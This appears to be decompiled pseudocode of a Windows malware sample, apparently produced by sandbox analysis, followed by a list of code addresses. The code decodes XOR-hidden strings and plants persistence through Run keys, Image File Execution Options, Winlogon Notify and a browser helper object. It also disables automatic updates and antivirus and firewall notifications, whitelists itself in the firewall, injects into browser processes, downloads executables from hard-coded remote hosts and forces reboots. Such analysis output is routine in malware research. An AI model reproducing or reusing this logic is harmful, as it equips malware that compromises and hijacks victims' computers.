												SetFileAttributesA(_t286, _t543); // executed
												_t288 = CreateFileA(_t543, 0x40000000, 0, 0, 2, 0x80, 0); // executed
												_t625[0x28] = _t288;
												__eflags = _t288;
												_t575 = _t288;
												if(_t288 == 0) {
													L81:
													_t544 =  &(_t625[0x342]);
													_t289 = GetTempPathA(0x104, _t544);
													_push(0x80);
													_push( *0x4120d0);
													L00405E30();
													SetFileAttributesA(_t289, _t544);
													_t291 = CreateFileA(_t544, 0x40000000, 0, 0, 2, 0x80, 0);
													_t625[0x28] = _t291;
													__eflags = _t291;
													_t575 = _t291;
													if(_t291 == 0) {
														L84:
														_t625[0x342] = 0;
														L85:
														__eflags = _t625[0x342];
														if(_t625[0x342] != 0) {
															CreateFileA( &(_t625[0x348]), 0x80000000, 1, 0, 3, 0, 0); // executed
														}
														_t545 =  &(_t625[0x2b]);
														GetSystemDirectoryA(_t545, 0x104);
														_push(0x41103e);
														_push(_t545);
														L00405E30();
														E004012C2(_t545);
														ExpandEnvironmentStringsA("%CommonProgramFiles%\\System\\", _t545, 0x104);
														E004012C2(_t545);
														ExpandEnvironmentStringsA("%AppData%\\", _t545, 0x104);
														E004012C2(_t545);
														_t301 = "Software\\Microsoft\\Windows\\CurrentVersion\\Run";
														while(1) {
															__eflags = _t301 - 0x40724d;
															if(_t301 >= 0x40724d) {
																break;
															}
															 *_t301 =  *_t301 ^ 0x000000d4;
															_t301 =  &(_t301[1]);
														}
														_t302 = RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, 0x20006,  &(_t625[0x26])); // executed
														__eflags = _t302;
														if(_t302 == 0) {
															L92:
															__eflags = _t625[0xb];
															if(_t625[0xb] == 0) {
																_t558 =  &(_t625[0x55a]);
																_t442 = E00401251(_t625[0x26]);
																_push(_t558);
																L00405E40();
																_t443 = _t442 + 1;
																__eflags = _t443;
																RegSetValueExA(_t625[0x2b],  *0x4120b0, 0, 1, _t558, _t443);
															}
															RegDeleteValueA(_t625[0x27], "winrnt.exe"); // executed
															RegCloseKey(_t625[0x26]); // executed
															L95:
															__eflags =  *0x412100 - 2;
															if( *0x412100 != 2) {
																L135:
																_t305 = CreateThread(0, 0x10000, E0040265F, 2, 0,  &(_t625[0x27])); // executed
																CloseHandle(_t305);
																_t307 = "sOfTwaRe\\mIcRoSofT\\cOdE SToRe dAtAbAsE\\Distribution Units\\{BA168755-D1D0-B2E2-F2AB-FE41DD2CB2AB}";
																while(1) {
																	__eflags = _t307 - 0x407060;
																	if(_t307 >= 0x407060) {
																		break;
																	}
																	 *_t307 =  *_t307 ^ 0x000000d4;
																	_t307 =  &(_t307[1]);
																}
																_t625[0xc] = 0;
																while(1) {
																	E004011CF(0x80000002, "sOfTwaRe\\mIcRoSofT\\cOdE SToRe dAtAbAsE\\Distribution Units\\{BA168755-D1D0-B2E2-F2AB-FE41DD2CB2AB}");
																	__eflags = _t625[0xc] - 9;
																	if(_t625[0xc] <= 9) {
																		goto L174;
																	}
																	_t625[0x16] = 0;
																	_t625[0x17] = 0;
																	_t366 = E004025C3();
																	__eflags = _t366;
																	if(_t366 != 0) {
																		L171:
																		 *_t625 = 0;
																		L175:
																		_t625[0xd] = 0x3b;
																		do {
																			__eflags = _t625[0x342];
																			if(_t625[0x342] != 0) {
																				_push(0);
																				_push("opera.exe");
																				_push("seamonkey.exe");
																				_push("mozilla.exe");
																				_push("firefox.exe");
																				_push("iexplore.exe");
																				_push("explorer.exe");
																				E0040318D( &(_t625[0x349]));
																				_t625 =  &(_t625[8]);
																			}
																			__eflags = _t625[0xa];
																			if(_t625[0xa] != 0) {
																				_t549 =  &(_t625[0x3cb]);
																				SetFileAttributesA(_t549, 0x21); // executed
																				_t343 = RegCreateKeyA(0x80000002,  &(_t625[0x40f]),  &(_t625[0x26])); // executed
																				__eflags = _t343;
																				if(_t343 == 0) {
																					E00401251(_t625[0x26]);
																					_t625[0x27] = 1;
																					_t347 = RegSetValueExA(_t625[0x2b], "IsInstalled", 0, 4,  &(_t625[0x28]), 4); // executed
																					_push(_t549);
																					L00405E40();
																					_t348 = _t347 + 1;
																					__eflags = _t348;
																					RegSetValueExA(_t625[0x2b], "StubPath", 0, 1, _t549, _t348); // executed
																					RegCloseKey(_t625[0x26]); // executed
																				}
																			}
																			__eflags = _t625[0xb];
																			_t609 =  &(_t625[0x26]);
																			if(_t625[0xb] == 0) {
																				_t310 = RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, 0x20006, _t609);
																				__eflags = _t310;
																				if(_t310 == 0) {
																					L186:
																					_t546 =  &(_t625[0x55a]);
																					_push(_t546);
																					L00405E40();
																					_t311 = _t310 + 1;
																					__eflags = _t311;
																					_push(_t311);
																					_push(_t546);
																					_push(1);
																					_push(0);
																					_push( *0x4120b0);
																					goto L187;
																				}
																				_t310 = RegOpenKeyExA(0x80000001, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, 0x20006, _t609);
																				__eflags = _t310;
																				if(_t310 != 0) {
																					goto L188;
																				}
																				goto L186;
																			} else {
																				_t550 =  &(_t625[0x48f]);
																				SetFileAttributesA(_t550, 0x21); // executed
																				_t317 = RegCreateKeyA(0x80000002, "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\explorer.exe", _t609); // executed
																				__eflags = _t317;
																				if(_t317 != 0) {
																					L188:
																					__eflags = _t625[9];
																					if(_t625[9] == 0) {
																						goto L198;
																					}
																					_t547 =  &(_t625[0x27]);
																					_t318 = RegCreateKeyExA(0x80000002, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced", 0, 0, 0, 0xf003f, 0x408778, _t547, 0); // executed
																					__eflags = _t318;
																					if(_t318 == 0) {
																						L191:
																						RegSetValueExA(_t625[0x2b], "SubshellState", 0, 3,  &(_t625[0x1ef]), 0x22a); // executed
																						RegCloseKey(_t625[0x26]); // executed
																						L192:
																						_t548 =  &(_t625[0x387]);
																						SetFileAttributesA(_t548, 0x21); // executed
																						__eflags =  *0x412100 - 2;
																						_t612 =  &(_t625[0x26]);
																						if( *0x412100 != 2) {
																							_t323 = RegCreateKeyA(0x80000000, "CLSID\\{0D97A4D2-9F3D-E91C-5EAD-E685720E2FCC}\\InProcServer32", _t612);
																							__eflags = _t323;
																							if(_t323 != 0) {
																								goto L198;
																							}
																							_push(_t548);
																							L00405E40();
																							RegSetValueExA(_t625[0x2b], 0, 0, 1, _t548, _t323 + 1);
																							RegSetValueExA(_t625[0x2b], "ThreadingModel", 0, 1, "Both", 5);
																							RegCloseKey(_t625[0x26]);
																							_t328 = RegCreateKeyA(0x80000002, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Browser Helper Objects\\{0D97A4D2-9F3D-E91C-5EAD-E685720E2FCC}", _t612);
																							__eflags = _t328;
																							if(_t328 != 0) {
																								goto L198;
																							}
																							L197:
																							RegCloseKey(_t625[0x26]); // executed
																							goto L198;
																						}
																						_t330 = RegCreateKeyA(0x80000002, "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify\\{BC84DF00-BC38-9902-8082-6FCBF2D87A0B}", _t612); // executed
																						__eflags = _t330;
																						if(_t330 != 0) {
																							goto L198;
																						}
																						_t332 = E00401251(_t625[0x26]);
																						_push(_t548);
																						L00405E40();
																						RegSetValueExA(_t625[0x2b], "DLLName", 0, 1, _t548, _t332 + 1); // executed
																						RegSetValueExA(_t625[0x2b], "Startup", 0, 1, "Startup", 8); // executed
																						goto L197;
																					}
																					_t336 = RegCreateKeyExA(0x80000001, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced", 0, 0, 0, 0xf003f, 0x408778, _t547, 0);
																					__eflags = _t336;
																					if(_t336 != 0) {
																						goto L192;
																					}
																					goto L191;
																				}
																				_t338 = E00401251(_t625[0x26]);
																				_push(_t550);
																				L00405E40();
																				_push(_t338 + 1);
																				_push(_t550);
																				_push(1);
																				_push(0);
																				_push("Debugger");
																				L187:
																				RegSetValueExA(_t625[0x2b], ??, ??, ??, ??, ??); // executed
																				RegCloseKey(_t625[0x26]); // executed
																				goto L188;
																			}
																			L198:
																			SetFileAttributesA( &(_t625[0x55b]), 0x21); // executed
																			Sleep(0x3e8); // executed
																			_t241 =  &(_t625[0xd]);
																			 *_t241 = _t625[0xd] - 1;
																			__eflags =  *_t241;
																		} while ( *_t241 >= 0);
																		_t354 = RegCreateKeyExA(0x80000002, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced", 0, 0, 0, 0xf003f, 0,  &(_t625[0x12]), 0);
																		__eflags = _t354;
																		if(_t354 == 0) {
																			_t625[0x10] = 4;
																			_t554 =  &(_t625[0x10]);
																			_t356 = RegQueryValueExA(_t625[0x16], "g00d d0gg", 0, 0, _t554,  &(_t625[0x10]));
																			__eflags = _t356;
																			if(_t356 == 0) {
																				_t359 = _t625[0xf] - 1;
																				__eflags = _t359;
																				_t625[0xf] = _t359;
																				if(_t359 == 0) {
																					RegDeleteValueA(_t625[0x12], "g00d d0gg");
																					Sleep(0x1388);
																					__eflags =  *0x412100 - 2;
																					if( *0x412100 != 2) {
																						ExitWindowsEx(6, 0);
																					} else {
																						RtlAdjustPrivilege(0x13, 1, 0,  &(_t625[0xe]));
																						 *0x412240(1);
																					}
																				} else {
																					RegSetValueExA(_t625[0x16], "g00d d0gg", 0, 4, _t554, 4);
																				}
																			}
																			RegCloseKey(_t625[0x11]);
																		}
																		continue;
																	}
																	_t368 = RegCreateKeyExA(0x80000001, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced", 0, 0, 0, 0x2001f, 0,  &(_t625[0x1c]), 0);
																	__eflags = _t368;
																	if(_t368 != 0) {
																		__eflags =  *_t625;
																		if( *_t625 == 0) {
																			goto L175;
																		}
																		L173:
																		_t625[0xc] = 0;
																		goto L175;
																	}
																	_t624 =  &(_t625[0x19]);
																	GetSystemTimeAsFileTime(_t624);
																	_t625[0x18] = 8;
																	_t605 =  &(_t625[0x17]);
																	_t370 = RegQueryValueExA(_t625[0x20], "ConnPred", 0,  &(_t625[0x17]), _t605,  &(_t625[0x18]));
																	__eflags = _t370;
																	if(_t370 != 0) {
																		L144:
																		__eflags = E004014D8(_t624, 0x412070) - 0x4af;
																		if(__eflags <= 0) {
																			L155:
																			__eflags =  *0x412080;
																			if( *0x412080 == 0) {
																				L158:
																				_t625[0x18] = 8;
																				__eflags = RegQueryValueExA(_t625[0x20], "UseExtProfile", 0,  &(_t625[0x17]), _t605,  &(_t625[0x18]));
																				if(__eflags != 0) {
																					L160:
																					_t375 = E00402427(__eflags);
																					__eflags = _t375;
																					if(_t375 != 0) {
																						L170:
																						RegCloseKey(_t625[0x1b]);
																						goto L171;
																					}
																					_push(1);
																					_push(0);
																					_t378 = E0040211B("http://69.50.173.166/gdnOT2424.exe", 0);
																					__eflags = _t378;
																					if(_t378 == 0) {
																						L163:
																						_t625[0x18] = 8;
																						_t552 =  &(_t625[0x13]);
																						_t380 = RegQueryValueExA(_t625[0x20], "UseDflProfile", 0,  &(_t625[0x17]),  &(_t625[0x13]),  &(_t625[0x18]));
																						__eflags = _t380;
																						if(_t380 != 0) {
																							_t389 = _t625[0x16] + 0x1162f100;
																							__eflags = _t389;
																							asm("adc edx, 0xffffff9b");
																							_t625[0x12] = _t389;
																							_t625[0x13] = _t625[0x17];
																						}
																						__eflags = E004014D8( &(_t625[0x19]), _t552) - 0x152ab;
																						if(__eflags <= 0) {
																							goto L170;
																						} else {
																							_t383 = E00402427(__eflags);
																							__eflags = _t383;
																							if(_t383 != 0) {
																								goto L170;
																							}
																							_push(3);
																							_push(0);
																							_t385 = E0040211B("tombul.gif", 0);
																							__eflags = _t385;
																							if(_t385 == 0) {
																								goto L170;
																							}
																							_push(8);
																							_push(_t624);
																							_push(0xb);
																							_push(0);
																							_push("UseDflProfile");
																							L169:
																							RegSetValueExA(_t625[0x20], ??, ??, ??, ??, ??);
																							RegCloseKey(_t625[0x1b]);
																							 *_t625 = 1;
																							goto L173;
																						}
																					}
																					_t625[0x16] = _t625[0x19].dwLowDateTime;
																					_t625[0x17] = _t625[0x1a];
																					_push(8);
																					_push(_t624);
																					_push(0xb);
																					_push(0);
																					_push("UseExtProfile");
																					goto L169;
																				}
																				__eflags = E004014D8( &(_t625[0x19]),  &(_t625[0x16])) - 0x152ab;
																				if(__eflags <= 0) {
																					goto L163;
																				}
																				goto L160;
																			}
																			_push(3);
																			_push(0);
																			_t394 = E0040211B("grazie.gif", 0);
																			__eflags = _t394;
																			if(_t394 == 0) {
																				goto L158;
																			}
																			_t625[0x16] = _t625[0x19].dwLowDateTime;
																			_t625[0x17] = _t625[0x1a];
																			_push(8);
																			_push(_t624);
																			_push(0xb);
																			_push(0);
																			_push("ConnPred");
																			goto L169;
																		}
																		_t396 = E00402427(__eflags);
																		__eflags = _t396;
																		if(_t396 != 0) {
																			goto L170;
																		}
																		_t398 = E004019E8("http://utbidet-ugeas.biz/d/cc", 0, 1);
																		_t611 = 0;
																		__eflags = _t398;
																		_t553 = _t398;
																		if(_t398 != 0) {
																			_t403 = E00401E00(_t398,  &(_t625[0x15]), 2);
																			__eflags = _t403 - 2;
																			if(_t403 == 2) {
																				_t611 = 1;
																			}
																		}
																		E00401F59(_t553);
																		__eflags = _t611;
																		if(_t611 == 0) {
																			 *0x412080 = 0;
																		} else {
																			 *0x412070 = _t625[0x19];
																			_t402 = 0;
																			__eflags = _t625[0x14] - 0x49;
																			 *0x412074 = _t625[0x1a];
																			if(_t625[0x14] == 0x49) {
																				__eflags = _t625[0x14] - 0x54;
																				if(_t625[0x14] == 0x54) {
																					_t402 = 1;
																				}
																			}
																			 *0x412080 = _t402;
																		}
																		goto L155;
																	}
																	_t405 = E004014D8(_t624, _t605);
																	__eflags = _t405 - 0x152ab;
																	if(_t405 <= 0x152ab) {
																		goto L158;
																	}
																	goto L144;
																	L174:
																	_t204 =  &(_t625[0xc]);
																	 *_t204 =  &(_t625[0xc]->nLength);
																	__eflags =  *_t204;
																	goto L175;
																}
															}
															_t406 = "SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU";
															while(1) {
																__eflags = _t406 - 0x407214;
																if(_t406 >= 0x407214) {
																	break;
																}
																 *_t406 =  *_t406 ^ 0x000000d4;
																_t406 =  &(_t406[1]);
															}
															_t407 = "NoAutoUpdate";
															while(1) {
																__eflags = _t407 - 0x4071cf;
																if(_t407 >= 0x4071cf) {
																	break;
																}
																 *_t407 =  *_t407 ^ 0x000000d4;
																_t407 =  &(_t407[1]);
															}
															_t613 =  &(_t625[0x26]);
															_t408 = RegCreateKeyA(0x80000002, "SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU", _t613); // executed
															__eflags = _t408;
															if(_t408 == 0) {
																RegSetValueExA(_t625[0x2b], "NoAutoUpdate", 0, 4,  &(_t625[0x28]), 4); // executed
																RegCloseKey(_t625[0x26]);
															}
															_t409 = "SOFTWARE\\Microsoft\\Security Center";
															while(1) {
																__eflags = _t409 - 0x4071c2;
																if(_t409 >= 0x4071c2) {
																	break;
																}
																 *_t409 =  *_t409 ^ 0x000000d4;
																_t409 =  &(_t409[1]);
															}
															_t410 = "AntiVirusOverride";
															while(1) {
																__eflags = _t410 - 0x407188;
																if(_t410 >= 0x407188) {
																	break;
																}
																 *_t410 =  *_t410 ^ 0x000000d4;
																_t410 =  &(_t410[1]);
															}
															_t411 = "AntiVirusDisableNotify";
															while(1) {
																__eflags = _t411 - 0x407176;
																if(_t411 >= 0x407176) {
																	break;
																}
																 *_t411 =  *_t411 ^ 0x000000d4;
																_t411 =  &(_t411[1]);
															}
															_t412 = "FirewallDisableNotify";
															while(1) {
																__eflags = _t412 - 0x40715f;
																if(_t412 >= 0x40715f) {
																	break;
																}
																 *_t412 =  *_t412 ^ 0x000000d4;
																_t412 =  &(_t412[1]);
															}
															_t413 = "UpdatesDisableNotify";
															while(1) {
																__eflags = _t413 - 0x407149;
																if(_t413 >= 0x407149) {
																	break;
																}
																 *_t413 =  *_t413 ^ 0x000000d4;
																_t413 =  &(_t413[1]);
															}
															_t414 = RegOpenKeyExA(0x80000002, "SOFTWARE\\Microsoft\\Security Center", 0, 0x20006, _t613); // executed
															__eflags = _t414;
															if(_t414 == 0) {
																_t557 =  &(_t625[0x28]);
																RegSetValueExA(_t625[0x2b], "AntiVirusOverride", 0, 4, _t557, 4); // executed
																RegSetValueExA(_t625[0x2b], "AntiVirusDisableNotify", 0, 4, _t557, 4); // executed
																RegSetValueExA(_t625[0x2b], "FirewallDisableNotify", 0, 4, _t557, 4); // executed
																RegSetValueExA(_t625[0x2b], "UpdatesDisableNotify", 0, 4, _t557, 4); // executed
																RegCloseKey(_t625[0x26]); // executed
															}
															_t415 = "SYSTEM\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\StandardProfile\\AuthorizedApplications\\List";
															while(1) {
																__eflags = _t415 - 0x407134;
																if(_t415 >= 0x407134) {
																	break;
																}
																 *_t415 =  *_t415 ^ 0x000000d4;
																_t415 =  &(_t415[1]);
															}
															_t416 = RegOpenKeyExA(0x80000002, "SYSTEM\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\StandardProfile\\AuthorizedApplications\\List", 0, 0x2001f, _t613); // executed
															__eflags = _t416;
															if(_t416 != 0) {
																goto L135;
															}
															_t418 = E00401000(0x8000);
															_t625[0x1d] = 0x4000;
															_t614 = _t418;
															_t419 = 0x407080;
															_t625[0x27] = 0x4000;
															while(1) {
																__eflags = _t419 - 0x4070a4;
																if(_t419 >= 0x4070a4) {
																	break;
																}
																 *_t419 =  *_t419 ^ 0x000000d4;
																_t419 =  &(_t419[1]);
															}
															_t625[0xd] = 0;
															while(1) {
																_t151 =  &(_t614[0x4000]); // 0x4000
																_t555 = _t151;
																_t423 = RegEnumValueA(_t625[0x2d], _t625[0x13], _t614,  &(_t625[0x2b]), 0,  &(_t625[0x1e]), _t151,  &(_t625[0x1d]));
																__eflags = _t423;
																if(_t423 != 0) {
																	break;
																}
																__eflags = _t625[0x1c] - 1;
																if(_t625[0x1c] == 1) {
																	_t425 = E00401311(_t555, 0x40708d);
																	__eflags = _t425;
																	if(_t425 != 0) {
																		RegDeleteValueA(_t625[0x27], _t614);
																	}
																}
																_t146 =  &(_t625[0xd]);
																 *_t146 =  &(_t625[0xd]->nLength);
																__eflags =  *_t146;
																_t625[0x1d] = 0x4000;
																_t625[0x27] = 0x4000;
															}
															_t556 =  &(_t625[0x55a]);
															_t428 = wsprintfA(_t614, 0x407080, _t556) + 1;
															__eflags = _t428;
															_t625 =  &(_t625[3]);
															RegSetValueExA(_t625[0x2b], _t556, 0, 1, _t614, _t428);
															E00401029(_t614);
															RegCloseKey(_t625[0x26]);
															goto L135;
														}
														_t446 = RegOpenKeyExA(0x80000001, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, 0x20006,  &(_t625[0x26]));
														__eflags = _t446;
														if(_t446 != 0) {
															goto L95;
														}
														goto L92;
													}
													__eflags = _t291 - 0xffffffff;
													if(_t291 == 0xffffffff) {
														goto L84;
													}
													L83:
													WriteFile(_t575, 0x408840, 0x5e00,  &(_t625[0x28]), 0); // executed
													CloseHandle(_t625[0x28]); // executed
													goto L85;
												}
												__eflags = _t288 - 0xffffffff;
												if(_t288 != 0xffffffff) {
													goto L83;
												}
												goto L81;
											}
											__eflags = _t454 + 1;
											if(_t454 + 1 != 0) {
												L64:
												WriteFile(_t625[0x2c], 0x40e640, 0x1400,  &(_t625[0x28]), 0); // executed
												__eflags = _t625[3];
												if(_t625[3] != 0) {
													SetFileTime(_t625[0x2b],  &(_t625[0x21]),  &(_t625[0x22]),  &(_t625[0x23])); // executed
												}
												CloseHandle(_t625[0x28]); // executed
												_t625[9] = 1;
												_push(0);
												_push("winlogon.exe");
												_t559 =  &(_t625[0x388]);
												_t460 = E0040318D(_t559);
												_t625 =  &(_t625[3]);
												__eflags = _t460;
												if(_t460 == 0) {
													_push(0);
													_push("explorer.exe");
													E0040318D(_t559);
													_t625 =  &(_t625[3]);
												}
												_push(0);
												_push("kernel32.dll");
												_push(_t559);
												L78:
												E0040318D();
												_t625 =  &(_t625[3]);
												CreateFileA( &(_t625[0x38c]), 0x80000000, 1, 0, 3, 0, 0); // executed
												goto L79;
											}
											goto L76;
										}
										__eflags = _t280 + 1;
										if(_t280 + 1 != 0) {
											goto L64;
										}
										goto L73;
									}
									L70:
									_t625[9] = 1;
									_push(0);
									_push("kernel32.dll");
									_push( &(_t625[0x388]));
									goto L78;
								}
								__eflags = _t276 + 1;
								if(_t276 + 1 == 0) {
									goto L69;
								}
								goto L64;
							}
							L33:
							CloseHandle(_t625[0x28]);
						}
						goto L29;
					}
				}
				__eflags = _t258 - 0xffffffff;
				if(_t258 != 0xffffffff) {
					WriteFile(_t258, 0x4072a0, 0x800,  &(_t625[0x28]), 0); // executed
					_t506 = E004010B2();
					_t625[6] = _t506;
					__eflags = _t506;
					if(_t506 == 0) {
						_t625[6] = 0xc6;
					}
					_t508 = E00401000(_t623 + 0x64);
					 *((char*)(_t508 + _t623)) = 0;
					_t607 = _t508;
					_t620 = _t508;
					_t603 = _t625[5];
					_t509 = _t508 + _t623;
					while(1) {
						__eflags = _t620 - _t509;
						if(_t620 >= _t509) {
							break;
						}
						_t534 = _t625[6] & 0x000000ff ^  *_t603;
						_t603 =  &(_t603[0]);
						 *_t620 = _t534;
						_t620 = _t620 + 1;
						_t509 = _t607 + _t623;
					}
					_t510 =  &(_t625[0x55a]);
					_t562 = _t607 + _t623;
					_push(_t510);
					L00405E40();
					_t621 = _t562 +  &(_t510[1]);
					__eflags = _t621 - _t562 + 0x64;
					while(__eflags < 0) {
						 *_t621 = E004010B2();
						_t621 = _t621 + 1;
						_t20 = _t623 + 0x64; // 0x64
						__eflags = _t621 - _t607 + _t20;
					}
					 *(_t607 + _t623 + 1) = _t623;
					_t564 = _t607 + _t623;
					_push( &(_t625[0x55a]));
					_t622 = _t564;
					_push( &(_t564[1]));
					L00405E20();
					_t513 =  &(_t564[0x19]);
					while(1) {
						__eflags = _t622 - _t513;
						if(_t622 >= _t513) {
							break;
						}
						 *_t622 =  *_t622 ^ _t625[6] & 0x000000ff;
						_t622 =  &(_t622[0]);
						_t29 = _t623 + 0x64; // 0x64
						_t513 = _t607 + _t29;
					}
					WriteFile(_t625[0x2c], _t607, _t623 + 0x64,  &(_t625[0x28]), 0); // executed
					E00401029(_t607);
					__eflags = _t625[3];
					if(_t625[3] != 0) {
						SetFileTime(_t625[0x2b],  &(_t625[0x21]),  &(_t625[0x22]),  &(_t625[0x23])); // executed
					}
					CloseHandle(_t625[0x28]); // executed
					_t565 =  &(_t625[0x3d0]);
					CreateFileA(_t565, 0x80000000, 1, 0, 3, 0, "true"); // executed
					E00401251(_t625[0x26]);
					_t625[0x27] = 1;
					_t523 = RegSetValueExA(_t625[0x2b], "IsInstalled", 0, 4,  &(_t625[0x28]), 4); // executed
					_push(_t565);
					L00405E40();
					_t524 = _t523 + 1;
					__eflags = _t524;
					RegSetValueExA(_t625[0x2b], "StubPath", 0, 1, _t565, _t524); // executed
					_t625[0xa] = 1;
				}
				L1:
				if(_t255 >= 0x407286) {
					_t256 = CreateMutexA(0, 0, "{0C8E6D89-EA51-848A-7775-6C2CC072CA88}"); // executed
					_t625[0x28] = _t256;
					__eflags = _t256;
					if(_t256 == 0) {
						Sleep(0x7d0);
					} else {
						WaitForSingleObject(_t256, 0x2710);
						CloseHandle(_t625[0x28]);
					}
					goto L6;
				} else {
					 *_t255 =  *_t255 ^ 0x000000d4;
					_t255 =  &(_t255[1]);
					goto L1;
				}
			}

0x00404938
0x00404940
0x00404945
0x0040494b
0x00404950
0x00404951
0x00404956
0x00404957
0x0040495c
0x0040495c
0x004049aa
0x004049af
0x004049b7
0x004049cf
0x004049d4
0x004049db
0x004049dd
0x00404b6f
0x00404b76
0x00404b88
0x00404b94
0x00404b99
0x00404ba0
0x00404ba2
0x00404ce5
0x00404ce5
0x00404cea
0x00404cec
0x00404cee
0x00404cf0
0x00404cf0
0x00404cf2
0x00404cf9
0x00404cfe
0x00404d00
0x00404d02
0x00404d04
0x00404d04
0x00404d06
0x00404d0d
0x00404d1a
0x00404d1b
0x00404d27
0x00404d2f
0x00404d30
0x00404d35
0x00404d39
0x00404d3c
0x00404d3c
0x00404d3e
0x00000000
0x00000000
0x00404d48
0x00404d4a
0x00404d4f
0x00404d4f
0x00404d58
0x00404d65
0x00404d6a
0x00404d6c
0x00404dad
0x00404dad
0x00404dba
0x00404dbf
0x00404dc1
0x00404dc7
0x00404dd7
0x00404ddc
0x00404dde
0x00000000
0x00000000
0x00404df7
0x00404dfc
0x00404e03
0x00404e05
0x00000000
0x00000000
0x00404e07
0x00404e08
0x00000000
0x00000000
0x00404e0a
0x00404e20
0x00404e2c
0x00404e48
0x00404e4d
0x00404e54
0x00404e5b
0x00404e62
0x00404e62
0x00404e64
0x00000000
0x00000000
0x00404e6e
0x00404e70
0x00404e71
0x00404e73
0x00404e73
0x00404e62
0x00000000
0x00404dc1
0x00404d6e
0x00404d75
0x00404d76
0x00404d78
0x00404d7d
0x00404d7e
0x00404d83
0x00404d85
0x00000000
0x00000000
0x00404d87
0x00404d89
0x00404d8e
0x00404d90
0x00404d92
0x00404d94
0x00404d99
0x00404d9a
0x00404d9f
0x00404da6
0x00404da8
0x00000000
0x00000000
0x00404daa
0x00404dab
0x00000000
0x00000000
0x00000000
0x00404ba8
0x00404bae
0x00404bba
0x00404bbf
0x00404bc6
0x00404bcd
0x00404bd4
0x00404bd4
0x00404bd6
0x00000000
0x00000000
0x00404be0
0x00404be2
0x00404be3
0x00404be5
0x00404be5
0x00404be8
0x00404bee
0x00404bf5
0x00404bf6
0x00404bfb
0x00404bfd
0x00404c18
0x00404c1d
0x00404c25
0x00404c2b
0x00000000
0x00404c2b
0x00404c06
0x00404c07
0x00404c0e
0x00404c0f
0x00404c14
0x00404c16
0x00404c4c
0x00404c51
0x00404c58
0x00404c5a
0x00000000
0x00000000
0x00404c5c
0x00404c5f
0x00000000
0x00000000
0x00404c64
0x00404c69
0x00404c6d
0x00404c6f
0x00404c8c
0x00404c92
0x00404c9b
0x00404ca0
0x00404ca4
0x00404ca6
0x00404cad
0x00404caf
0x00404cb4
0x00404cb7
0x00404cbe
0x00404cc3
0x00404cc3
0x00404cc5
0x00404cd0
0x00404cd4
0x00404cd5
0x00000000
0x00404cc7
0x00404cc9
0x00000000
0x00404cc9
0x00404cc5
0x00404cdb
0x00404e76
0x00404e7a
0x00404e84
0x00404e8c
0x00404e91
0x00404e96
0x00404e9c
0x00404ea1
0x00404ea2
0x00404ea8
0x00404eae
0x00404ec6
0x00404ecb
0x00404ed2
0x00404ed4
0x00404f78
0x00404f78
0x00404f7d
0x00404f80
0x00404fa3
0x00404fb0
0x00404fb5
0x00404fba
0x00404fc1
0x00404fc7
0x00404fdf
0x00404fe4
0x00404feb
0x00404fed
0x00404ff6
0x00404ff6
0x00404ffb
0x00404ffe
0x00000000
0x00000000
0x00405006
0x0040500b
0x00405010
0x00405017
0x0040501d
0x00405035
0x0040503a
0x00405041
0x00405043
0x0040504c
0x0040504c
0x00405051
0x00405054
0x00000000
0x00000000
0x00405080
0x00405085
0x00405092
0x00405097
0x0040509c
0x004050a3
0x004050a9
0x004050c1
0x004050c6
0x004050cd
0x004050cf
0x004050d1
0x004050d8
0x004050d8
0x004050e5
0x004050ea
0x004050ef
0x004050f6
0x004050fc
0x00405114
0x00405119
0x00405120
0x00405122
0x00405124
0x00405153
0x00405153
0x0040515b
0x0040515b
0x00405163
0x0040517c
0x0040517c
0x00405186
0x0040518e
0x00405193
0x00405198
0x00405199
0x004051a0
0x004051b0
0x004051b7
0x004051c7
0x004051ce
0x004051d3
0x004051d8
0x004051d8
0x004051dd
0x00000000
0x00000000
0x004051df
0x004051e2
0x004051e2
0x004051fe
0x00405203
0x00405205
0x00405229
0x00405229
0x0040522e
0x00405237
0x0040523e
0x00405243
0x00405244
0x00405249
0x00405249
0x0040525d
0x0040525d
0x0040526e
0x0040527a
0x0040527f
0x0040527f
0x00405286
0x004054f1
0x00405509
0x0040550f
0x00405514
0x00405519
0x00405519
0x0040551e
0x00000000
0x00000000
0x00405520
0x00405523
0x00405523
0x00405526
0x0040552e
0x00405538
0x0040553d
0x00405542
0x00000000
0x00000000
0x00405548
0x00405550
0x00405558
0x0040555d
0x0040555f
0x004057d5
0x004057d5
0x004057f2
0x004057f2
0x004057fa
0x004057fa
0x00405802
0x00405804
0x00405806
0x0040580b
0x00405810
0x00405815
0x0040581a
0x0040581f
0x0040582c
0x00405831
0x00405831
0x00405834
0x00405839
0x00405841
0x00405849
0x00405863
0x00405868
0x0040586a
0x00405873
0x00405878
0x0040589d
0x004058a2
0x004058a3
0x004058a8
0x004058a8
0x004058bb
0x004058c7
0x004058c7
0x0040586a
0x004058cc
0x004058d1
0x004058d8
0x00405933
0x00405938
0x0040593a
0x00405957
0x00405957
0x0040595e
0x0040595f
0x00405964
0x00405964
0x00405965
0x00405966
0x00405967
0x00405969
0x0040596b
0x00000000
0x0040596b
0x0040594e
0x00405953
0x00405955
0x00000000
0x00000000
0x00000000
0x004058da
0x004058dc
0x004058e4
0x004058f4
0x004058f9
0x004058fb
0x00405989
0x00405989
0x0040598e
0x00000000
0x00000000
0x00405996
0x004059b8
0x004059bd
0x004059bf
0x004059e7
0x00405a04
0x00405a10
0x00405a15
0x00405a17
0x00405a1f
0x00405a24
0x00405a2b
0x00405a32
0x00405a9f
0x00405aa4
